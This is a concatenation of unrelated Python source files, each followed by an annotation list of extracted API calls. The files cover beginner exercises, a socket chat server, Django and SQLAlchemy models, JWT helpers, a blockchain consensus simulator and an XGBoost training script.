False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((24576, 24626), 'backend_app.models.Model.objects.filter', 'models.Model.objects.filter', ([], {'id': 'weight.model_id_id'}), '(id=weight.model_id_id)\n', (24603, 24626), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((24822, 24885), 'backend_app.models.Project.objects.filter', 'models.Project.objects.filter', ([], {'id': "serializer.data['project_id']"}), "(id=serializer.data['project_id'])\n", (24851, 24885), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26273, 26310), 'os.path.join', 'opjoin', (['ckpts_dir', 'f"""{weight.id}.bin"""'], {}), "(ckpts_dir, f'{weight.id}.bin')\n", (26279, 26310), True, 'from os.path import join as opjoin\n'), ((27492, 27518), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[0]'}), '(name__icontains=name[0])\n', (27493, 27518), False, 'from django.db.models import Q\n'), ((27521, 27547), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[1]'}), '(name__icontains=name[1])\n', (27522, 27547), False, 'from django.db.models import Q\n'), ((25659, 25682), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (25680, 25682), False, 'import datetime\n'), ((25857, 25919), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'id': 'weight.pretrained_on_id'}), '(id=weight.pretrained_on_id)\n', (25891, 25919), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26412, 26424), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (26422, 26424), False, 'import uuid\n')] |
number_to_multiply = int(input("Input number to multiply: ")) # Do not change this line
how_often = int(input("Input how often to multiply: ")) # Do not change this line
for i in range(number_to_multiply, (how_often * number_to_multiply) + 1, number_to_multiply):
print(i)
#fyrsta ár er 15, annað 9 og öll hin samsvara 4 hvert
dog_age = int(input("Input dog's age: ")) # Do not change this line
human_age = 0
if dog_age <= 0 or dog_age > 16:
print("Invalid age")
while dog_age > 0 and dog_age <= 16:
if dog_age == 1:
human_age = 15
elif dog_age == 2:
human_age = 24
elif dog_age > 2:
human_age = 28 + 4*(dog_age - 3)
print("Human age:", human_age)
break
import math
start_int = int(input("Input starting integer: "))
while start_int >= 2:
result = round(math.sqrt(start_int), 4)
start_int = result
print(result)
max_int = int(input("Input max integer: "))
for i in range(0, max_int + 1):
for j in range(1, i + 1):
print(j, end=" ")
print()
| [
"math.sqrt"
] | [((824, 844), 'math.sqrt', 'math.sqrt', (['start_int'], {}), '(start_int)\n', (833, 844), False, 'import math\n')] |
import re
url_removal = re.compile(r'https?://\S*')
rt_user_removal = re.compile(r'(RT )?(@\S+)?')
spaces_removal = re.compile(r'\s+')
def sanitize_text(tweet_text):
tweet_text = rt_user_removal.sub('', tweet_text)
tweet_text = url_removal.sub('', tweet_text)
tweet_text = spaces_removal.sub(' ', tweet_text)
return tweet_text.strip()
def preprocess_text(text):
return sanitize_text(text)
| [
"re.compile"
] | [((25, 52), 're.compile', 're.compile', (['"""https?://\\\\S*"""'], {}), "('https?://\\\\S*')\n", (35, 52), False, 'import re\n'), ((71, 99), 're.compile', 're.compile', (['"""(RT )?(@\\\\S+)?"""'], {}), "('(RT )?(@\\\\S+)?')\n", (81, 99), False, 'import re\n'), ((117, 135), 're.compile', 're.compile', (['"""\\\\s+"""'], {}), "('\\\\s+')\n", (127, 135), False, 'import re\n')] |
from recipes.models import Purchases
from django.template.defaulttags import register
from django import template
register = template.Library() # noqa
@register.filter
def check_subscription(author_id, user):
return user.follower.filter(author=author_id).exists()
@register.filter
def check_favorite(recipe_id, user):
return user.favorites.filter(following_recipe=recipe_id).exists()
@register.filter
def check_purchase(request, recipe):
if request.user.is_authenticated:
return Purchases.objects.filter(user=request.user, recipe=recipe)
else:
session_purchase = request.session.get('purchase', default=None)
if session_purchase is not None:
return str(recipe.id) in session_purchase
else:
return False
@register.filter
def purchases_count(request):
if request.user.is_authenticated:
return Purchases.objects.filter(user=request.user).count()
else:
try:
return len(request.session['purchase'])
except KeyError:
return 0
| [
"recipes.models.Purchases.objects.filter",
"django.template.Library"
] | [((126, 144), 'django.template.Library', 'template.Library', ([], {}), '()\n', (142, 144), False, 'from django import template\n'), ((506, 564), 'recipes.models.Purchases.objects.filter', 'Purchases.objects.filter', ([], {'user': 'request.user', 'recipe': 'recipe'}), '(user=request.user, recipe=recipe)\n', (530, 564), False, 'from recipes.models import Purchases\n'), ((884, 927), 'recipes.models.Purchases.objects.filter', 'Purchases.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (908, 927), False, 'from recipes.models import Purchases\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import socket as sckt
import select as slct
import Queue
import defaults
import server_manager
socket = sckt.socket(sckt.AF_INET, sckt.SOCK_STREAM)
socket.setsockopt(sckt.SOL_SOCKET, sckt.SO_REUSEADDR, 1)
socket.bind((sckt.gethostname(), defaults.PORT))
# socket.bind(('', defaults.PORT))
socket.listen(5)
running = True
manager = server_manager.management()
while running:
read, write, exceptions = slct.select([socket, sys.stdin] + manager.inputs, manager.outputs, [], 0)
for client in read:
if client == socket:
manager.reg_client(client)
elif client == sys.stdin:
msg = raw_input()
if msg[:1] == '/':
msg = msg[1:].split()
if msg[0] == 'exit':
manager.shutdown()
running = False
sys.stdout.write('Exiting\n')
else:
manager.receive(client)
for client in write:
try:
msg = manager.clients[client].queue.get_nowait()
except Queue.Empty:
manager.outputs.remove(client)
else:
manager.clients[client].send(msg)
for exc in exceptions:
print(exc)
socket.close()
| [
"select.select",
"socket.socket",
"server_manager.management",
"socket.gethostname",
"sys.stdout.write"
] | [((165, 208), 'socket.socket', 'sckt.socket', (['sckt.AF_INET', 'sckt.SOCK_STREAM'], {}), '(sckt.AF_INET, sckt.SOCK_STREAM)\n', (176, 208), True, 'import socket as sckt\n'), ((393, 420), 'server_manager.management', 'server_manager.management', ([], {}), '()\n', (418, 420), False, 'import server_manager\n'), ((463, 536), 'select.select', 'slct.select', (['([socket, sys.stdin] + manager.inputs)', 'manager.outputs', '[]', '(0)'], {}), '([socket, sys.stdin] + manager.inputs, manager.outputs, [], 0)\n', (474, 536), True, 'import select as slct\n'), ((279, 297), 'socket.gethostname', 'sckt.gethostname', ([], {}), '()\n', (295, 297), True, 'import socket as sckt\n'), ((784, 813), 'sys.stdout.write', 'sys.stdout.write', (['"""Exiting\n"""'], {}), "('Exiting\\n')\n", (800, 813), False, 'import sys\n')] |
from scraper import TwitterScraper, ICanHazDadJokeScraper
scrapers = [
TwitterScraper('baddadjokes'),
ICanHazDadJokeScraper()
]
if __name__ == '__main__':
for scraper in scrapers:
scraper.scrape()
| [
"scraper.ICanHazDadJokeScraper",
"scraper.TwitterScraper"
] | [((76, 105), 'scraper.TwitterScraper', 'TwitterScraper', (['"""baddadjokes"""'], {}), "('baddadjokes')\n", (90, 105), False, 'from scraper import TwitterScraper, ICanHazDadJokeScraper\n'), ((111, 134), 'scraper.ICanHazDadJokeScraper', 'ICanHazDadJokeScraper', ([], {}), '()\n', (132, 134), False, 'from scraper import TwitterScraper, ICanHazDadJokeScraper\n')] |
import os
result = [os.path.join(dp, f) for dp, dn, filenames in os.walk(".") for f in filenames if os.path.splitext(f)[1] == '.cpp']
for p in result:
with open(p, "r") as f:
data = f.read()
with open( p, "w" ) as f:
f.write( "#include \"stdafx.h\"\n\n" + data );
| [
"os.path.splitext",
"os.path.join",
"os.walk"
] | [((23, 42), 'os.path.join', 'os.path.join', (['dp', 'f'], {}), '(dp, f)\n', (35, 42), False, 'import os\n'), ((68, 80), 'os.walk', 'os.walk', (['"""."""'], {}), "('.')\n", (75, 80), False, 'import os\n'), ((103, 122), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (119, 122), False, 'import os\n')] |
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Micron Technology, Inc. All rights reserved.
from typing import List
from tools import config
from tools.base import BaseTest
from tools.helpers import shlex_join
class KmtTest(BaseTest):
def __init__(self, name: str, args: List[str]):
super().__init__(name, "kmt")
self.args = self.__fix_args(args)
self.kmt_out_path = None
self.report["kmt"] = {
"args": self.args,
"cmdline": shlex_join(self.args),
}
@staticmethod
def __fix_args(args: List):
new_args = ["kmt"] + list(args)
if not any([arg.startswith("-L") for arg in args]):
new_args.append("-L")
if not any([arg.startswith("-s") for arg in args]):
new_args.append("-s1")
new_args.append(config.KVDB_HOME)
new_args.append(config.KVS_NAME)
return new_args
def execute(self):
super()._execute_init()
completed_info = super()._run_command(self.args)
self.kmt_out_path = completed_info.out_path
self._postprocess()
self._print_and_save_summary()
super()._save_report()
def _postprocess(self):
init_phase = {
"name": "init",
"operations": [],
}
test_phase = {
"name": "test",
"operations": [],
}
with open(self.kmt_out_path) as fd:
for line in fd:
if line.startswith("iclose"):
record = line.split()
total_puts = int(record[6])
run_time_ms = int(record[15])
puts_per_second = int(total_puts / (run_time_ms / 1000.0))
init_phase["run_time_ms"] = run_time_ms
init_put_operation = {
"name": "put",
"throughput": puts_per_second,
}
init_phase["operations"].append(init_put_operation)
elif line.startswith("tclose"):
record = line.split()
total_gets, total_puts = int(record[5]), int(record[6])
run_time_ms = int(record[15])
puts_per_second = int(total_puts / (run_time_ms / 1000.0))
gets_per_second = int(total_gets / (run_time_ms / 1000.0))
test_phase["run_time_ms"] = run_time_ms
test_put_operation = {
"name": "put",
"throughput": puts_per_second,
}
test_get_operation = {
"name": "get",
"throughput": gets_per_second,
}
test_phase["operations"].extend(
[test_put_operation, test_get_operation]
)
elif line.startswith("slatency"):
record = line.split()
phase = record[1]
op = record[2]
(
lat_min,
lat_max,
lat_avg,
lat_p90,
lat_p95,
lat_p99,
lat_p99_9,
lat_p99_99,
) = [int(x) for x in record[5:13]]
if phase == "init":
assert op == "put"
operation_dict = init_put_operation
elif phase == "test":
assert op in ["get", "put"]
if op == "put":
operation_dict = test_put_operation
elif op == "get":
operation_dict = test_get_operation
else:
assert False
else:
assert False
operation_dict["latency_us"] = {
"avg": lat_avg,
"max": lat_max,
"min": lat_min,
"percentiles": [
[90, lat_p90],
[95, lat_p95],
[99, lat_p99],
[99.9, lat_p99_9],
[99.99, lat_p99_99],
],
}
self.report["phases"] = [
init_phase,
test_phase,
]
| [
"tools.helpers.shlex_join"
] | [((504, 525), 'tools.helpers.shlex_join', 'shlex_join', (['self.args'], {}), '(self.args)\n', (514, 525), False, 'from tools.helpers import shlex_join\n')] |
# Copyright (c) 2018 IoTeX
# This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
# warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
# permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
# License 2.0 that can be found in the LICENSE file.
"""This module defines the Player class, which represents a player in the network and contains functionality to make transactions, propose blocks, and validate blocks.
"""
import random
import grpc
import numpy as np
from proto import simulator_pb2_grpc
from proto import simulator_pb2
import solver
import consensus_client
import consensus_failurestop
# enum for defining the consensus types
class CTypes:
Honest = 0
FailureStop = 1
ByzantineFault = 2
class Player:
id = 0 # player id
MEAN_TX_FEE = 0.2 # mean transaction fee
STD_TX_FEE = 0.05 # std of transaction fee
DUMMY_MSG_TYPE = 1999 # if there are no messages to process, dummy message is sent to consensus engine
msgMap = {(DUMMY_MSG_TYPE, bytes()): "dummy msg"} # maps message to message name for printing
correctHashes = [] # hashes of blocks proposed by HONEST consensus types
def __init__(self, consensusType):
"""Creates a new Player object"""
self.id = Player.id # the player's id
Player.id += 1
self.blockchain = [] # blockchain (simplified to a list)
self.connections = [] # list of connected players
self.inbound = [] # inbound messages from other players in the network at heartbeat r
self.outbound = [] # outbound messages to other players in the network at heartbeat r
self.seenMessages = set() # set of seen messages
if consensusType == CTypes.Honest or consensusType == CTypes.ByzantineFault:
self.consensus = consensus_client.Consensus()
elif consensusType == CTypes.FailureStop:
self.consensus = consensus_failurestop.ConsensusFS()
self.consensusType = consensusType
self.consensus.playerID = self.id
self.consensus.player = self
self.nMsgsPassed = [0]
self.timeCreated = []
def action(self, heartbeat):
"""Executes the player's actions for heartbeat r"""
print("player %d action started at heartbeat %f" % (self.id, heartbeat))
# self.inbound: [sender, (msgType, msgBody), timestamp]
# print messages
for sender, msg, timestamp in self.inbound:
print("received %s from %s with timestamp %f" % (Player.msgMap[msg], sender, timestamp))
# if the Player received no messages before the current heartbeat, add a `dummy` message so the Player still pings the consensus in case the consensus has something it wants to return
# an example of when this is useful is in the first round when consensus proposes a message; the Player needs to ping it to receive the proposal
if len(list(filter(lambda x: x[2] <= heartbeat, self.inbound))) == 0:
self.inbound += [[-1, (Player.DUMMY_MSG_TYPE, bytes()), heartbeat]]
# process each inbound message
for sender, msg, timestamp in self.inbound:
# note: msg is a tuple: (msgType, msgBody)
# cannot see the message yet if the heartbeat is less than the timestamp
if timestamp > heartbeat: continue
if msg[0] != Player.DUMMY_MSG_TYPE and (msg, sender) in self.seenMessages: continue
self.seenMessages.add((msg, sender))
print("sent %s to consensus engine" % Player.msgMap[msg])
received = self.consensus.processMessage(sender, msg)
for recipient, mt, v in received:
# if mt = 2, the msgBody is comprised of message|blockHash
# recipient is the recipient of the message the consensus sends outwards
# mt is the message type (0 = view state change message, 1 = block committed, 2 = special case)
# v is message value
# TODO: fix this
'''if "|" in v[1]:
separator = v[1].index("|")
blockHash = v[1][separator+1:]
v = (v[0], v[1][:separator])'''
if v not in Player.msgMap:
Player.msgMap[v] = "msg "+str(len(Player.msgMap))
print("received %s from consensus engine" % Player.msgMap[v])
if mt == 0: # view state change message
self.outbound.append([recipient, v, timestamp])
elif mt == 1: # block to be committed
self.blockchain.append(v[1]) # append block hash
self.nMsgsPassed.append(0)
self.timeCreated.append(timestamp)
print("committed %s to blockchain" % Player.msgMap[v])
else: # newly proposed block
self.outbound.append([recipient, v, timestamp])
print("PROPOSED %s BLOCK"%("HONEST" if self.consensusType == CTypes.Honest else "BYZANTINE"))
if self.consensusType != CTypes.ByzantineFault:
Player.correctHashes.append(blockHash)
else:
Player.correctHashes.append("")
# also gossip the current message
# I think this is not necessary for tendermint so I am commenting it out
'''if msg[0] != Player.DUMMY_MSG_TYPE and self.consensusType != CTypes.FailureStop:
self.outbound.append([msg, timestamp])'''
self.inbound = list(filter(lambda x: x[2] > heartbeat, self.inbound)) # get rid of processed messages
return self.sendOutbound()
def sendOutbound(self):
"""Send all outbound connections to connected nodes.
Returns list of nodes messages have been sent to"""
if len(self.outbound) == 0:
sentMsgs = False
else:
sentMsgs = True
ci = set()
for recipient, message, timestamp in self.outbound:
if recipient == -1: # -1 means message is broadcast to all connections
for c in self.connections:
self.outbound.append([c.id, message, timestamp])
continue
recipient = list(filter(lambda x: x.id == recipient, self.connections))[0] # recipient is an id; we want to find the player which corresponds to this id in the connections
ci.add(recipient)
sender = self.id
self.nMsgsPassed[-1] += 1
dt = np.random.lognormal(self.NORMAL_MEAN, self.NORMAL_STD) # add propagation time to timestamp
print("sent %s to %s" % (Player.msgMap[message], recipient.id))
recipient.inbound.append([sender, message, timestamp+dt])
self.outbound.clear()
print()
return list(ci), sentMsgs
def __str__(self):
return "player %s" % (self.id)
def __repr__(self):
return "player %s" % (self.id)
def __hash__(self):
return self.id
| [
"consensus_failurestop.ConsensusFS",
"consensus_client.Consensus",
"numpy.random.lognormal"
] | [((2124, 2152), 'consensus_client.Consensus', 'consensus_client.Consensus', ([], {}), '()\n', (2150, 2152), False, 'import consensus_client\n'), ((6945, 6999), 'numpy.random.lognormal', 'np.random.lognormal', (['self.NORMAL_MEAN', 'self.NORMAL_STD'], {}), '(self.NORMAL_MEAN, self.NORMAL_STD)\n', (6964, 6999), True, 'import numpy as np\n'), ((2232, 2267), 'consensus_failurestop.ConsensusFS', 'consensus_failurestop.ConsensusFS', ([], {}), '()\n', (2265, 2267), False, 'import consensus_failurestop\n')] |
import argparse
from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path
from xgboost import XGBClassifier
import warnings
warnings.filterwarnings('ignore')
# from sklearn.preprocessing import StandardScaler
def training_series(X_train, y_train, normalizer=None, xgb_params={}):
printx('########### training FVC model ... ############')
printx('training set shape: {}'.format(X_train.shape))
if normalizer:
X_train = normalizer.fit_transform(X_train)
t0 = time.time()
clf = XGBClassifier(**xgb_params)
printx(clf.get_params())
clf.fit(X_train, y_train)
# printx('model parameters: \n{}'.format(clf.get_params()))
clfkit = {'FVC':clf}
printx('use {:.0f} s\n'.format(time.time()-t0))
return [clfkit], normalizer
parser = argparse.ArgumentParser(
description='extract the complex region' )
parser.add_argument(
'--in_tp', type=str,
default="training_tp_tensor.record",
help="wait to describe")
parser.add_argument(
'--in_fp', type=str,
default="training_fp_tensor.record",
help="wait to describe")
parser.add_argument(
'--model', type=str,
default="no",
help="the absolute path of pretrained model, default no pretrained model.")
parser.add_argument(
'--out_model', type=str,
default="retrain.model",
help="wait to describe")
parser.add_argument(
'--random_seed', type=int,
default=0,
help="random state, default 0")
parser.add_argument(
'--scale_strategy', type=str,
default='standard', choices=['standard', 'no'],
help='set normalization strategy, default standard scale. \nIf set no, oringal features will be used. \nIf --model is not no, the parameter will be ignored.')
args = parser.parse_args()
train_TP_file = args.in_tp
train_FP_file = args.in_fp
premodel_file = args.model
out_model = args.out_model
random_seed = args.random_seed
scale_strategy = args.scale_strategy
xgb_params = {
'n_estimators':200,
'n_jobs':-1,
'random_state':random_seed,
# 'tree_method':'approx'
}
if premodel_file != 'no':
printx("loading the pre-trained model: {} ...".format(premodel_file))
premodel, normalizer = load_from_pickle(premodel_file, '../pretrain')
xgb_params['xgbdef'] = list(premodel[0].values())[0]
elif premodel_file == 'no' and scale_strategy == 'standard':
printx("standardly scale all features ...")
from sklearn.preprocessing import StandardScaler
normalizer = StandardScaler()
else:
normalizer = None
printx('load files, {} and {}'.format(train_TP_file, train_FP_file))
X_train, y_train = readData(train_TP_file, train_FP_file)
outmodel, normalizer = save_to_pickle(training_series(X_train, y_train, normalizer=normalizer, xgb_params=xgb_params),
out_model)
| [
"FVC_utils.load_from_pickle",
"FVC_utils.printx",
"FVC_utils.readData",
"argparse.ArgumentParser",
"FVC_utils.time.time",
"sklearn.preprocessing.StandardScaler",
"warnings.filterwarnings",
"xgboost.XGBClassifier"
] | [((151, 184), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (174, 184), False, 'import warnings\n'), ((802, 867), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""extract the complex region"""'}), "(description='extract the complex region')\n", (825, 867), False, 'import argparse\n'), ((2616, 2654), 'FVC_utils.readData', 'readData', (['train_TP_file', 'train_FP_file'], {}), '(train_TP_file, train_FP_file)\n', (2624, 2654), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((312, 369), 'FVC_utils.printx', 'printx', (['"""########### training FVC model ... ############"""'], {}), "('########### training FVC model ... ############')\n", (318, 369), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((509, 520), 'FVC_utils.time.time', 'time.time', ([], {}), '()\n', (518, 520), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((531, 558), 'xgboost.XGBClassifier', 'XGBClassifier', ([], {}), '(**xgb_params)\n', (544, 558), False, 'from xgboost import XGBClassifier\n'), ((2199, 2245), 'FVC_utils.load_from_pickle', 'load_from_pickle', (['premodel_file', '"""../pretrain"""'], {}), "(premodel_file, '../pretrain')\n", (2215, 2245), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((2368, 2411), 'FVC_utils.printx', 'printx', (['"""standardly scale all features ..."""'], {}), "('standardly scale all features ...')\n", (2374, 2411), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((2482, 2498), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2496, 2498), False, 'from sklearn.preprocessing import StandardScaler\n'), ((742, 753), 'FVC_utils.time.time', 'time.time', ([], {}), '()\n', (751, 753), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n')] |
import subprocess
from masonite.helpers import config
def has_unmigrated_migrations():
if not config('application.debug'):
return False
from wsgi import container
from config.database import DB
try:
DB.connection()
except Exception:
return False
migration_directory = ['databases/migrations']
for key, value in container.providers.items():
if type(key) == str and 'MigrationDirectory' in key:
migration_directory.append(value)
for directory in migration_directory:
try:
output = bytes(subprocess.check_output(
['orator', 'migrate:status', '-c',
'config/database.py', '-p', directory]
)).decode('utf-8')
if 'No' in output:
return True
except Exception:
pass
return False
| [
"subprocess.check_output",
"wsgi.container.providers.items",
"masonite.helpers.config",
"config.database.DB.connection"
] | [((367, 394), 'wsgi.container.providers.items', 'container.providers.items', ([], {}), '()\n', (392, 394), False, 'from wsgi import container\n'), ((100, 127), 'masonite.helpers.config', 'config', (['"""application.debug"""'], {}), "('application.debug')\n", (106, 127), False, 'from masonite.helpers import config\n'), ((234, 249), 'config.database.DB.connection', 'DB.connection', ([], {}), '()\n', (247, 249), False, 'from config.database import DB\n'), ((586, 688), 'subprocess.check_output', 'subprocess.check_output', (["['orator', 'migrate:status', '-c', 'config/database.py', '-p', directory]"], {}), "(['orator', 'migrate:status', '-c',\n 'config/database.py', '-p', directory])\n", (609, 688), False, 'import subprocess\n')] |
from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
email = Column(String(250), nullable=False)
password = Column(String(250))
picture = Column(String(250))
class Supermarket(Base):
__tablename__ = 'supermarket'
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
address = Column(String(250), nullable=False)
picture = Column(String(250))
user_id = Column(Integer, ForeignKey('user.id'))
user = relationship(User)
@property
def serialize(self):
return {
'id': self.id,
'name': self.name,
'address': self.address,
'picture': self.picture,
}
class Products(Base):
__tablename__ = 'products'
id = Column(Integer, primary_key=True)
name = Column(String(80), nullable=False)
details = Column(String(250))
price = Column(String(8))
picture = Column(String(250))
supermarket_id = Column(Integer, ForeignKey('supermarket.id'))
supermarket = relationship(Supermarket)
user_id = Column(Integer, ForeignKey('user.id'))
user = relationship(User)
@property
def serialize(self):
return {
'id': self.id,
'name': self.name,
'details': self.details,
'price': self.price,
'picture': self.picture,
}
engine = create_engine('sqlite:///supermarket.db')
Base.metadata.create_all(engine)
| [
"sqlalchemy.orm.relationship",
"sqlalchemy.create_engine",
"sqlalchemy.ForeignKey",
"sqlalchemy.String",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.Column"
] | [((200, 218), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (216, 218), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((1672, 1713), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///supermarket.db"""'], {}), "('sqlite:///supermarket.db')\n", (1685, 1713), False, 'from sqlalchemy import create_engine\n'), ((276, 309), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (282, 309), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((545, 578), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (551, 578), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((774, 792), 'sqlalchemy.orm.relationship', 'relationship', (['User'], {}), '(User)\n', (786, 792), False, 'from sqlalchemy.orm import relationship\n'), ((1057, 1090), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (1063, 1090), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1320, 1345), 'sqlalchemy.orm.relationship', 'relationship', (['Supermarket'], {}), '(Supermarket)\n', (1332, 1345), False, 'from sqlalchemy.orm import relationship\n'), ((1410, 1428), 'sqlalchemy.orm.relationship', 'relationship', (['User'], {}), '(User)\n', (1422, 1428), False, 'from sqlalchemy.orm import relationship\n'), ((328, 339), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (334, 339), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((376, 387), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (382, 387), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((427, 438), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (433, 438), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((461, 472), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (467, 472), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((597, 608), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (603, 608), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((647, 658), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (653, 658), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((697, 708), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (703, 708), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((740, 761), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""user.id"""'], {}), "('user.id')\n", (750, 761), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1109, 1119), 'sqlalchemy.String', 'String', (['(80)'], {}), '(80)\n', (1115, 1119), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1158, 1169), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (1164, 1169), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1190, 1199), 'sqlalchemy.String', 'String', (['(8)'], {}), '(8)\n', (1196, 1199), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1222, 1233), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (1228, 1233), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1272, 1300), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""supermarket.id"""'], {}), "('supermarket.id')\n", (1282, 1300), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1376, 1397), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""user.id"""'], {}), "('user.id')\n", (1386, 1397), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n')] |
from itsdangerous import TimedJSONWebSignatureSerializer, \
JSONWebSignatureSerializer
from nanohttp import settings, context, HTTPForbidden
class BaseJWTPrincipal:
def __init__(self, payload):
self.payload = payload
@classmethod
def create_serializer(cls, force=False, max_age=None):
config = cls.get_config()
if force:
return JSONWebSignatureSerializer(
config['secret'],
algorithm_name=config['algorithm']
)
else:
return TimedJSONWebSignatureSerializer(
config['secret'],
expires_in=max_age or config['max_age'],
algorithm_name=config['algorithm']
)
def dump(self, max_age=None):
return self.create_serializer(max_age=max_age).dumps(self.payload)
@classmethod
def load(cls, encoded, force=False):
if encoded.startswith('Bearer '):
encoded = encoded[7:]
payload = cls.create_serializer(force=force).loads(encoded)
return cls(payload)
@classmethod
def get_config(cls):
raise NotImplementedError()
class JWTPrincipal(BaseJWTPrincipal):
def is_in_roles(self, *roles):
if 'roles' in self.payload:
if set(self.payload['roles']).intersection(roles):
return True
return False
def assert_roles(self, *roles):
"""
.. versionadded:: 0.29
:param roles:
:return:
"""
if roles and not self.is_in_roles(*roles):
raise HTTPForbidden()
@property
def email(self):
return self.payload.get('email')
@property
def session_id(self):
return self.payload.get('sessionId')
@property
def id(self):
return self.payload.get('id')
@property
def roles(self):
return self.payload.get('roles', [])
@classmethod
def get_config(cls):
"""
Warning! Returned value is a dict, so it's mutable. If you modify this
value, default config of the whole project will be changed and it may
cause unpredictable problems.
"""
return settings.jwt
class JWTRefreshToken:
def __init__(self, payload):
self.payload = payload
@classmethod
def create_serializer(cls):
return TimedJSONWebSignatureSerializer(
settings.jwt.refresh_token.secret,
expires_in=settings.jwt.refresh_token.max_age,
algorithm_name=settings.jwt.refresh_token.algorithm
)
def dump(self):
return self.create_serializer().dumps(self.payload)
@classmethod
def load(cls, encoded):
payload = cls.create_serializer().loads(encoded)
return cls(payload)
@property
def id(self):
return self.payload.get('id')
class DummyIdentity(JWTPrincipal):
def __init__(self, *roles):
super().__init__({'roles': list(roles)})
class ImpersonateAs:
backup_identity = None
def __init__(self, principal):
self.principal = principal
def __enter__(self):
if hasattr(context, 'identity'):
self.backup_identity = context.identity
context.identity = self.principal
def __exit__(self, exc_type, exc_val, exc_tb):
context.identity = self.backup_identity
| [
"itsdangerous.JSONWebSignatureSerializer",
"nanohttp.HTTPForbidden",
"itsdangerous.TimedJSONWebSignatureSerializer"
